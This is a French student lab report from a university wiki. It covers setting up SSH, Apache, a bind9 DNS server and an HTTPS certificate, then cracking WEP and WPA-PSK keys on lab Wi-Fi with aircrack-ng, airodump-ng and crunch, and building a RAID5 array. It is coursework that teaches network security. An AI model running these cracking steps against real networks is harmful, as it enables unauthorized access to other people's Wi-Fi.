'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
